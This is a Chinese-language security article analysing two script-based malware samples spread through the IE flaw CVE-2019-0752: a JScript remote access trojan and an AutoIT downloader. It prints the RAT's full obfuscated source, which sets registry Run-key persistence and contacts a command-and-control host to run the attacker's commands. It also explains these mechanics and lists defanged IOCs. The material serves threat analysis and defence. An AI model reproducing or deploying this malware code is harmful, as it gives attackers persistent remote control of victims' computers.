基于脚本的恶意软件:IE攻击新趋势 – 作者:Kriston

在过去的几个月中,通过Internet Explorer(IE)浏览器漏洞检测到了复杂的脚本恶意软件,这些恶意软件感染了Windows用户。利用脚本语言,可以轻松创建具有多种功能的复杂恶意软件。

本文选择了两个感染Windows OS用户的脚本恶意软件为例,他们都利用了CVE-2019-0752 IE漏洞。CVE-2019-0752是2019年4月修复的脚本引擎内存泄露漏洞,它可在目标计算机上远程代码执行(RCE)。

第一个是JScript远程访问木马(RAT),它可以确保在目标系统上持久控制,回连攻击者,攻击者可以在目标计算机上执行任意命令。第二个是AutoIT下载程序,它可以下载并执行恶意软件。

浏览器中的JScript RAT

4月18日从guaranteetemporaireenligne.com域下载的c.js JScript RAT,下图中显示CVE-2019-0752漏洞利用的PowerShell命令。接下来将重点介绍分析c.js文件。

word-image.png

c.js File

下面c.js脚本是一个混淆后的脚本:

var _0xd766=[“\x31\x6D\x20\x31\x75\x3D\x22\x31\x44\x22\x3B\x31\x6D\x20\x32\x66\x3D\x22\x32\x31\x3A\x2F\x2F\x32\x30\x2E\x31\x56\x2E\x31\x4A\x2F\x31\x46\x2F\x31\x54\x2F\x31\x4F\x22\x3B\x31\x6D\x20\x32\x34\x3D\x22\x31\x46\x2E\x31\x4B\x22\x3B\x31\x6D\x20\x31\x52\x3D\x22\x31\x48\x22\x3B\x31\x6D\x20\x32\x35\x3D\x27\x31\x43\x20\x7B\x62\x28\x29\x3B\x7D\x20\x31\x42\x20\x28\x62\x29\x20\x7B\x31\x53\x28\x31\x6A\x28\x70\x2C\x61\x2C\x63\x2C\x6B\x2C\x65\x2C\x64\x29\x7B\x65\x3D\x31\x6A\x28\x63\x29\x7B\x31\x6B\x28\x63\x3C\x61\x3F\x5C\x27\x5C\x27\x3A\x65\x28\x31\x50\x28\x63\x2F\x61\x29\x29\x29\x2B\x28\x28\x63\x3D\x63\x25\x61\x29\x3E\x33\x35\x3F\x31\x79\x2E\x31\x57\x28\x63\x2B\x32\x39\x29\x3A\x63\x2E\x31\x71\x28\x33\x36\x29\x29\x7D\x3B\x31\x72\x28\x21\x5C\x27\x5C\x27\x2E\x31\x78\x28\x2F\x5E\x2F\x2C\x31\x79\x29\x29\x7B\x31\x7A\x28\x63\x2D\x2D\x29\x7B\x64\x5B\x65\x28\x63\x29\x5D\x3D\x6B\x5B\x63\x5D\x7C\x7C\x65\x28\x63\x29\x7D\x6B\x3D\x5B\x31\x6A\x28\x65\x29\x7B\x31\x6B\x20\x64\x5B\x65\x5D\x7D\x5D\x3B\x65\x3D\x31\x6A\x28\x29\x7B\x31\x6B\x5C\x27\x5C\x5C\x5C\x5C\x77\x2B\x5C\x27\x7D\x3B\x63\x3D\x31\x7D\x3B\x31\x7A\x28\x63\x2D\x2D\x29\x7B\x31\x72\x28\x6B\x5B\x63\x5D\x29\x7B\x70\x3D\x70\x2E\x31\x78\x28\x31\x41\x20\x31\x51\x28\x5C\x27\x5C\x5C\x5C\x5C\x62\x5C\x27\x2B\x65\x28\x63\x29\x2B\x5C\x27\x5C\x5C\x5C\x5C\x62\x5C\x27\x2C\x5C\x27\x67\x5C\x27\x29\x2C\x6B\x5B\x63\x5D\x29\x7D\x7D\x31\x6B\x20\x70\x7D\x28\x5C\x27\x33\x20\x79\x3D\x63\x28\x42\x2C\x61\x29\x7B\x33\x20\x39\x3D\x5C\x5C\x5C\x27\x5C\x5C\x5C\x27\x3B\x6B\x28\x33\x20\x69\x3D\x30\x3B\x69\x3C\x61\x2E\x7A\x3B\x69\x2B\x2B\x29\x7B\x39\x3D\x39\x2B\x47\x2E\x6E\x28\x61\x2E\x4A\x28\x69\x29\x2E\x50\x28\x30\x29\x5E\x42\x29\x7D\x68\x20\x39\x7D\x3B\x33\x20\x78\x3D\x63\x28\x61\x29\x7B\x33\x20\x39\x3D\x22\x22\x3B\x33\x20\x64\x3D\x61\x2E\x52\x28\x2F\x2E\x7B\x31\x2C\x32\x7D\x2F\x67\x29\x7C\x7C\x5B\x5D\x3B\x6B\x28\x33\x20\x69\x3D\x30\x3B\x69\x3C\x64\x2E\x7A\x3B\x69\x2B\x2B\x29\x7B\x39\x2B\x3D\x47\x2E\x6E\x28\x54\x28\x64\x5B\x69\x5D\x2C\x31\x36\x29\x29\x7D\x3B\x68\x20\x39\x7D\x3B\x33\x20\x71\x3D\x63\x28\x6C\x2C\x73\x29\x7B\x68\x20\x74\x2E\x51\x28\x74\x2E\x53\x28\x29\x2A\x28\x73\x2D\x6C\x2B\x31\x29\x29\x2B\x6C\x7D\x3B\x33\x20\x62\x3D\x71\x28\x31\x2C\x4F\x29\x3B\x33\x20\x66\x3D\x22\x6F\x3A\x2F\x2F\x6D\x2E\x77\x2E\x76\x2F\x6A\x2F\x46\x2F\x48\x2F\x6A\x2E\x49\x3F\x72\x3D\x22\x2B\x62\x2E\x4B\x28\x29\x3B\x33\x20\x45\x3D\x22\x43\x22\x3B\x6B\x28\x3B\x3B\x29\x7B\x4C\x7B\x38\x3D\x44\x20\x4E\x28\x22\x4D\x2E\x55\x2E\x35\x2E\x31\x22\x29\x3B\x38\x2E\x31\x64\x28\x22\x31\x63\x22\x2C\x66\x2C\x30\x29\x3B\x70\x3D\x22\x31\x62\x2F\x34\x2E\x30\x20\x28\x31\x65\x3B\x20\x31\x66\x20\x37\x2E\x30\x3B\x20\x56\x20\x31\x68\x20\x36\x2E\x30\x29\x22\x3B\x75\x3D\x22\x31\x39\x2D\x31\x30\x22\x3B\x38\x2E\x31\x61\x28\x75\x2C\x70\x29\x3B\x38\x2E\x5A\x28\x29\x3B\x38\x2E\x59\x28\x29\x3B\x57\x28\x38\x2E\x58\x3D\x3D\x31\x31\x29\x7B\x33\x20\x41\x3D\x22\x33\x20\x66\x3D\x5C\x5C\x5C\x5C\x22\x6F\x3A\x2F\x2F\x6D\x2E\x77\x2E\x76\x2F\x6A\x2F\x46\x2F\x48\x2F\x31\x32\x2E\x49\x5C\x5C\x5C\x5C\x22\x3B\x33\x20\x45\x3D\x5C\x5C\x5C\x5C\x22\x43\x5C\x5C\x5C\x5C\x22\x3B\x22\x2B\x79\x28\x62\x2C\x78\x28\x38\x2E\x31\x38\x29\x29\x3B\x44\x20\x31\x37\x28\x41\x29\x28\x29\x7D\x7D\x31\x35\x28\x65\x29\x7B\x7D\x3B\x31\x33\x2E\x31\x34\x28\x31\x67\x29\x7D\x3B\x5C\x27\x2C\x32\x6F\x2C\x32\x37\x2C\x5C\x27\x7C\x7C\x7C\x31\x6D\x7C\x7C\x7C\x7C\x7C\x32\x63\x7C\x32\x64\x7C\x32\x61\x7C\x32\x38\x7C\x31\x6A\x7C\x32\x36\x7C\x7C\x32\x6D\x7C\x7C\x31\x6B\x7C\x7C\x31\x46\x7C\x32\x43\x7C\x32\x7A\x7C\x32\x30\x7C\x31\x57\x7C\x32\x31\x7C\x32\x75\x7C\x32\x76\x7C\x7C\x32\x78\x7C\x32\x77\x7C\x32\x42\x7C\x31\x4A\x7C\x31\x56\x7C\x32\x71\x7C\x32\x72\x7C\x32\x73\x7C\x31\x48\x7C\x32\x74\x7C\x31\x44\x7C\x31\x41\x7C\x31\x75\x7C\x31\x54\x7C\x31\x79\x7C\x31\x4F\x7C\x32\x41\x7C\x32\x47\x7C\x31\x71\x7C\x31\x43\x7C\x32\x48\x7C\x32\x49\x7C\x32\x46\x7C\x32\x45\x7C\x32\x70\x7C\x32\x44\x7C\x32\x4A\x7C\x31\x50\x7C\x32\x4B\x7C\x32\x32\x7C\x31\x72\x7C\x32\x65\x7C\x32\x62\x7C\x32\x6C\x7C\x32\x6E\x7C\x32\x6B\x7C\x32\x6A\x7C\x31\x6C\x7C\x32\x67\x7C\x31\x42\x7C\x7C\x31\x55\x7C\x32\x68\x7C\x32\x69\x7C\x32\x79\x7C\x32\x58\x7C\x33\x61\x7C\x33\x63\x7C\x33\x64\x7C\x33\x65\x7C\x33\x62\x7C\x33\x37\x5C\x27\x2E\x31\x4E\x28\x5C\x27\x7C\x5C\x27\x29\x2C\x30\x2C\x7B\x7D\x29\x29\x7D\x3B\x27\x3B\x31\x6D\x20\x31\x77\x3D\x27\x31\x43\x20\x7B\x61\x28\x29\x3B\x7D\x20\x31\x42\x20\x28\x33\x38\x29\x20\x7B\x31\x53\x28\x31\x6A\x28\x70\x2C\x61\x2C\x63\x2C\x6B\x2C\x65\x2C\x64\x29\x7B\x65\x3D\x31\x6A\x28\x63\x29\x7B\x31\x6B\x20\x63\x2E\x31\x71\x28\x33\x36\x29\x7D\x3B\x31\x72\x28\x21\x5C\x27\x5C\x27\x2E\x31\x78\x28\x2F\x5E\x2F\x2C\x31\x79\x29\x29\x7B\x31\x7A\x28\x63\x2D\x2D\x29\x7B\x64\x5B\x63\x2E\x31\x71\x28\x61\x29\x5D\x3D\x6B\x5B\x63\x5D\x7C\x7C\x63\x2E\x31\x71\x28\x61\x29\x7D\x6B\x3D\x5B\x31\x6A\x28\x65\x29\x7B\x31\x6B\x20\x64\x5B\x65\x5D\x7D\x5D\x3B\x65\x3D\x31\x6A\x28\x29\x7B\x31\x6B\x5C\x27\x5C\x5C\x5C\x5C\x77\x2B\x5C\x27\x7D\x3B\x63\x3D\x31\x7D\x3B\x31\x7A\x28\x63\x2D\x2D\x29\x7B\x31\x72\x28\x6B\x5B\x63\x5D\x29\x7B\x70\x3D\x70\x2E\x31\x78\x28\x31\x41\x20\x31\x51\x28\x5C\x27\x5C\x5C\x5C\x5C\x62\x5C\x27\x2B\x65\x28\x63\x29\x2B\x5C\x27\x5C\x5C\x5C\x5C\x62\x5C\x27\x2C\x5C\x27\x67\x5C\x27\x29\x2C\x6B\x5B\x63\x5D\x29\x7D\x7D\x31\x6B\x20\x70\x7D\x28\x5C\x27\x34\x20\x30\x3D\x22\x5C\x5C\x5C\x5C\x5C\x5C\x5C\x5C\x22\x3B\x35\x20\x33\x28\x31\x2E\x32\x28\x22\x31\x2E\x62\x22\x29\x2E\x36\x28\x22\x39\x22\x2B\x30\x2B\x22\x38\x22\x2B\x30\x2B\x22\x37\x22\x2B\x30\x2B\x22\x61\x22\x29\x29\x28\x29\x3B\x5C\x27\x2C\x31\x32\x2C\x31\x32\x2C\x5C\x27\x31\x69\x7C\x31\x6C\x7C\x31\x73\x7C\x31\x55\x7C\x31\x6D\x7C\x31\x41\x7C\x33\x33\x7C\x31\x44\x7C\x31\x47\x7C\x31\x49\x7C\x31\x48\x7C\x31\x4D\x5C\x27\x2E\x31\x4E\x28\x5C\x27\x7C\x5C\x27\x29\x2C\x30\x2C\x7B\x7D\x29\x29\x7D\x3B\x27\x3B\x31\x69\x3D\x22\x5C\x5C\x22\x3B\x31\x74\x3D\x22\x22\x3B\x31\x6F\x3D\x31\x6C\x2E\x31\x73\x28\x22\x31\x6C\x2E\x31\x4D\x22\x29\x3B\x31\x4C\x3D\x31\x6C\x2E\x31\x73\x28\x22\x31\x5A\x2E\x32\x51\x22\x29\x3B\x31\x77\x3D\x31\x4C\x2E\x32\x52\x28\x22\x2E\x31\x4B\x22\x2C\x31\x77\x2C\x30\x2C\x22\x22\x29\x3B\x31\x74\x3D\x31\x74\x2B\x22\x65\x22\x3B\x31\x76\x3D\x22\x31\x49\x22\x2B\x31\x69\x2B\x22\x31\x47\x22\x2B\x31\x69\x2B\x31\x75\x2B\x31\x69\x2B\x31\x52\x3B\x31\x6F\x2E\x31\x58\x28\x31\x76\x2C\x32\x35\x29\x3B\x31\x45\x3D\x31\x6F\x2E\x32\x53\x28\x22\x25\x32\x50\x25\x22\x29\x3B\x31\x6F\x2E\x32\x4F\x3D\x31\x45\x3B\x31\x70\x3D\x31\x45\x2B\x31\x69\x2B\x32\x34\x2B\x31\x74\x3B\x31\x76\x3D\x22\x31\x49\x22\x2B\x31\x69\x2B\x22\x31\x47\x22\x2B\x31\x69\x2B\x22\x32\x4C\x22\x2B\x31\x69\x2B\x22\x32\x32\x22\x2B\x31\x69\x2B\x22\x33\x34\x22\x2B\x31\x69\x2B\x22\x32\x33\x22\x2B\x31\x69\x2B\x31\x75\x3B\x31\x6F\x2E\x31\x58\x28\x31\x76\x2C\x31\x70\x29\x3B\x31\x6E\x3D\x31\x6C\x2E\x31\x73\x28\x22\x32\x4D\x2E\x32\x4E\x22\x29\x3B\x31\x6E\x2E\x32\x54\x28\x29\x3B\x31\x6E\x2E\x32\x55\x3D\x32\x3B\x31\x6E\x2E\x33\x30\x3D\x30\x3B\x31\x6E\x2E\x33\x31\x28\x31\x77\x29\x3B\x31\x6E\x2E\x33\x32\x28\x31\x70\x2C\x32\x29\x3B\x31\x6E\x2E\x32\x5A\x28\x29\x3B\x31\x6F\x2E\x32\x33\x28\x27\x22\x27\x2B\x31\x70\x2B\x27\x22\x27\x2C\x30\x2C\x32\x59\x29\x3B\x31\x59\x3D\x31\x6C\x2E\x31\x73\x28\x22\x31\x5A\x2E\x32\x56\x22\x29\x3B\x31\x70\x3D\x31\x6C\x2E\x32\x57\x3B\x31\x59\x2E\x33\x39\x28\x31\x70\x29\x3B”,”\x7C”,”\x73\x70\x6C\x69\x74″,”\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x6F\x74\x70\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x72\x65\x74\x75\x72\x6E\x7C\x57\x53\x63\x72\x69\x70\x74\x7C\x76\x61\x72\x7C\x73\x74\x72\x65\x61\x6D\x7C\x53\x68\x65\x6C\x6C\x4F\x62\x6A\x7C\x50\x61\x74\x68\x58\x7C\x74\x6F\x53\x74\x72\x69\x6E\x67\x7C\x69\x66\x7C\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x7C\x65\x78\x74\x7C\x61\x75\x74\x6F\x6E\x61\x6D\x65\x7C\x52\x65\x67\x50\x61\x74\x68\x7C\x64\x61\x74\x61\x32\x7C\x72\x65\x70\x6C\x61\x63\x65\x7C\x53\x74\x72\x69\x6E\x67\x7C\x77\x68\x69\x6C\x65\x7C\x6E\x65\x77\x7C\x63\x61\x74\x63\x68\x7C\x74\x72\x79\x7C\x6C\x6F\x61\x64\x65\x72\x4E\x61\x6D\x65\x7C\x50\x61\x74\x68\x59\x7C\x6C\x6F\x61\x64\x65\x72\x7C\x53\x6F\x66\x74\x77\x61\x72\x65\x7C\x64\x61\x74\x61\x7C\x48\x4B\x43\x55\x7C\x6E\x65\x74\x7C\x6A\x73\x7C\x45\x6E\x63\x4F\x62\x6A\x7C\x53\x68\x65\x6C\x6C\x7C\x73\x70\x6C\x69\x74\x7C\x77\x77\x77\x7C\x70\x61\x72\x73\x65\x49\x6E\x74\x7C\x52\x65\x67\x45\x78\x70\x7C\x72\x65\x67\x6E\x61\x6D\x65\x7C\x65\x76\x61\x6C\x7C\x6C\x6F\x61\x64\x65\x72\x32\x7C\x46\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x64\x64\x6E\x73\x7C\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65\x7C\x52\x65\x67\x57\x72\x69\x74\x65\x7C\x46\x73\x6F\x4F\x62\x6A\x7C\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x7C\x73\x65\x65\x6D\x65\x65\x7C\x68\x74\x74\x70\x7C\x57\x69\x6E\x64\x6F\x77\x73\x7C\x52\x75\x6E\x7C\x62\x6F\x74\x6E\x61\x6D\x65\x7C\x64\x61\x74\x61\x31\x7C\x68\x65\x7C\x38\x30\x7C\x63\x6F\x64\x7C\x7C\x73\x74\x7C\x57\x61\x69\x74\x46\x6F\x72\x52\x65\x73\x70\x6F\x6E\x73\x65\x7C\x58\x6D\x6C\x68\x74\x74\x70\x4F\x62\x6A\x7C\x72\x65\x73\x7C\x73\x74\x61\x74\x75\x73\x7C\x68\x6F\x73\x74\x7C\x53\x6C\x65\x65\x70\x7C\x52\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74\x7C\x55\x73\x65\x72\x7C\x63\x6D\x64\x7C\x32\x30\x30\x7C\x73\x65\x6E\x64\x7C\x73\x65\x72\x76\x65\x72\x7C\x41\x67\x65\x6E\x74\x7C\x36\x32\x7C\x66\x6C\x6F\x6F\x72\x7C\x64\x68\x7C\x65\x6E\x7C\x6C\x65\x6E\x67\x74\x68\x7C\x6B\x65\x79\x7C\x55\x73\x72\x61\x7C\x72\x6E\x64\x7C\x4D\x61\x74\x68\x7C\x6D\x61\x78\x7C\x53\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72\x7C\x6D\x69\x6E\x7C\x70\x68\x70\x7C\x55\x73\x72\x62\x7C\x66\x6F\x72\x7C\x6D\x61\x74\x63\x68\x7C\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74\x7C\x32\x35\x35\x7C\x63\x68\x61\x72\x41\x74\x7C\x57\x69\x6E\x48\x74\x74\x70\x7C\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x7C\x72\x61\x6E\x64\x6F\x6D\x7C\x57\x69\x6E\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x7C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x7C\x41\x44\x4F\x44\x42\x7C\x53\x74\x72\x65\x61\x6D\x7C\x43\x75\x72\x72\x65\x6E\x74\x44\x69\x72\x65\x63\x74\x6F\x72\x79\x7C\x41\x50\x50\x44\x41\x54\x41\x7C\x45\x6E\x63\x6F\x64\x65\x72\x7C\x45\x6E\x63\x6F\x64\x65\x53\x63\x72\x69\x70\x74\x46\x69\x6C\x65\x7C\x65\x78\x70\x61\x6E\x64\x45\x6E\x76\x69\x72\x6F\x6E\x6D\x65\x6E\x74\x53\x74\x72\x69\x6E\x67\x73\x7C\x4F\x70\x65\x6E\x7C\x54\x79\x70\x65\x7C\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74\x7C\x53\x63\x72\x69\x70\x74\x46\x75\x6C\x6C\x4E\x61\x6D\x65\x7C\x4D\x6F\x7A\x69\x6C\x6C\x61\x7C\x66\x61\x6C\x73\x65\x7C\x43\x6C\x6F\x73\x65\x7C\x50\x6F\x73\x69\x74\x69\x6F\x6E\x7C\x57\x72\x69\x74\x65\x54\x65\x78\x74\x7C\x53\x61\x76\x65\x54\x6F\x46\x69\x6C\x65\x7C\x52\x65\x67\x52\x65\x61\x64\x7C\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x7C\x7C\x7C\x4E\x54\x7C\x61\x61\x7C\x44\x65\x6C\x65\x74\x65\x46\x69\x6C\x65\x7C\x67\x65\x74\x7C\x35\x30\x30\x30\x7C\x6F\x70\x65\x6E\x7C\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x7C\x4D\x53\x49\x45″,””,”\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65″,”\x72\x65\x70\x6C\x61\x63\x65″,”\x5C\x77\x2B”,”\x5C\x62″,”\x67″];try{s()}catch(s){eval(function(_0xcddfx1,_0xcddfx2,_0xcddfx3,_0xcddfx4,_0xcddfx5,_0xcddfx6){_0xcddfx5= function(_0xcddfx3){return (_0xcddfx3< _0xcddfx2?_0xd766[4]:_0xcddfx5(parseInt(_0xcddfx3/ _0xcddfx2)))+ ((_0xcddfx3= _0xcddfx3% _0xcddfx2)> 35?String[_0xd766[5]](_0xcddfx3+ 29):_0xcddfx3.toString(36))};if(!_0xd766[4][_0xd766[6]](/^/,String)){while(_0xcddfx3–){_0xcddfx6[_0xcddfx5(_0xcddfx3)]= _0xcddfx4[_0xcddfx3]|| _0xcddfx5(_0xcddfx3)};_0xcddfx4= [function(_0xcddfx5){return _0xcddfx6[_0xcddfx5]}];_0xcddfx5= function(){return _0xd766[7]};_0xcddfx3= 1};while(_0xcddfx3–){if(_0xcddfx4[_0xcddfx3]){_0xcddfx1= _0xcddfx1[_0xd766[6]]( new RegExp(_0xd766[8]+ _0xcddfx5(_0xcddfx3)+ _0xd766[8],_0xd766[9]),_0xcddfx4[_0xcddfx3])}};return _0xcddfx1}(_0xd766[0],62,201,_0xd766[3][_0xd766[2]](_0xd766[1]),0,{}))}

经过去混淆处理后,可以在下图中看到两个打包的JScript代码片段存储在data1和data2中:

word-image-1.png

下图显示将data1中存储的代码放入HKCU\Software\loaderName项中,并使用EncodeScriptFile函数对存储在data2中的代码进行编码,并将其写入loader.jse文件。 然后将loader.jse脚本的路径传递到HKCU\Software\Microsoft\Windows\CurrentVersion\Run键值中。 还有一个host变量,初始值为hxxp://seemee[.]ddns[.]net/loader/loader2/www URL。 最后,运行loader.jse并删除c.js自身。

word-image-2.png

持久控守技术

首先,c.js脚本创建注册表项HKCU\Software\Microsoft\Windows\CurrentVersion\Run.并设置新值loaderName,它会使用某个loader.jse文件的路径,如下图所示。

word-image-3.png

word-image-4.png

“Run”key值使程序在用户每次登录时都运行,尚未创建的loader.jse脚本将在Windows操作系统每次引导时自动运行。 下图演示了c.js脚本在AppData文件夹中创建了loader.jse。 在Windows OS上,该文件夹默认为隐藏文件夹,因此目标较难检测到系统中存在的恶意文件。

word-image-5.png

word-image-6.png

创建loader.jse文件之后,c.js脚本在该文件中写入代码,如下图所示。

word-image-7.png

word-image-8.png

返回CreateFileW

word-image-9.png

word-image-10.png

Hook API WriteFile

loader.jse脚本已使用Microsoft的脚本编码进行编码。通过ShellExecute函数运行编码后的文件(如下图),然后c.js文件将自身删除。

word-image-11.png

word-image-12.png

连接到远程服务器

c.js文件还创建了一个名为HKCU\Software\loaderNam的注册表项。

word-image-13.png

执行c.js的这一步骤非常重要,在运行loader.jse时,它将打开注册表项HKCU\Software\loaderNam并运行代码。

word-image-15.png

查看注册表项loaderName中的打包代码时,可以注意到其中的function(p,a,c,k,e,d),表明其使用了Dean Edwards打包程序来混淆代码。

word-image-16.png

解压缩代码后,显示了对hxxp://seemee[.]ddns [.]net域loader.php页面的GET请求。 参数r是恶意脚本和远程服务器之间共享的随机数。 恶意脚本使用GET请求响应中的代码连接到cmd.php页面,攻击者可以利用该页面在目标机器执行命令。

word-image-17.png

请求响应中包含的脚本是一个无限循环,它向cmd.php页面发出请求以检索要执行的指令:

word-image-18.png

攻击者可以在目标系统上执行多个任务:执行命令,下载文件,重新启动Windows操作系统,终止当前任务并关闭Windows操作系统。

word-image-19.png

AutoIT脚本

在发现JScript RAT之后不久,2020年4月30日发现使用相同漏洞CVE-2019-0752从dark[.]crypterfile[.]com下载2.exe文件,本节将重点分析已编译的AutoIT脚本。

word-image-20.png

技术分析

拆解可执行文件(PE)时,发现已编译的AutoIT脚本。

1598015505.png!small

word-image-22.png

使用AutoIT反编译代码后,注意到其中的两个部分。 第一部分系统信息检索管理。 此信息存储在$asysinfo数组中。 该数组的第六个元素对应于逻辑处理器的数量,程序会检查逻辑处理器的数量是否大于或等于四个,并下载恶意文件。 恶意脚本会在目标系统上下载并执行多个文件,最后下载的文件存储在“当前用户启动”文件夹中,该文件将在用户每次登录操作系统时执行。

word-image-23.png

IOCs

JScript Sample

c.js:

751D161ED4AFD822925C0373395F014578F166467D20A4B1ADFDB27FD0A83C36

loader.jse:

CCCF25DCD1FA16017B2ACCF4BC501BE583824423FC3A09779116AE07D833F2B2

HTTP URLs:

hxxp://assurancetemporaireenligne[.]com/c[.]js

hxxp://seemee[.]ddns[.]net/loader/loader2/www/loader[.]php

hxxp://seemee[.]ddns[.]net/loader/loader2/www/cmd[.]php

AutoIT Downloader Sample

2.exe:

BA60EFE2E939DA16E3D240732FDA286FBD3DB3A0F06CB12D7042C7FAC9B82B86

HTTP URLs:

hxxp://dark[.]crypterfile[.]com/2[.]exe

hxxp://dark[.]crypterfile[.]com/1/desktop[.]exe

hxxp://dark[.]crypterfile[.]com/1/99[.]exe

hxxp://dark[.]crypterfile[.]com/1/Calc[.]vbs

hxxp://dark[.]crypterfile[.]com/1/calculator[.]exe

hxxp://dark[.]crypterfile[.]com/1/calc[.]exe

参考链接

https://unit42.paloaltonetworks.com/script-based-malware/

来源:freebuf.com 2020-08-21 21:20:12 by: Kriston

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论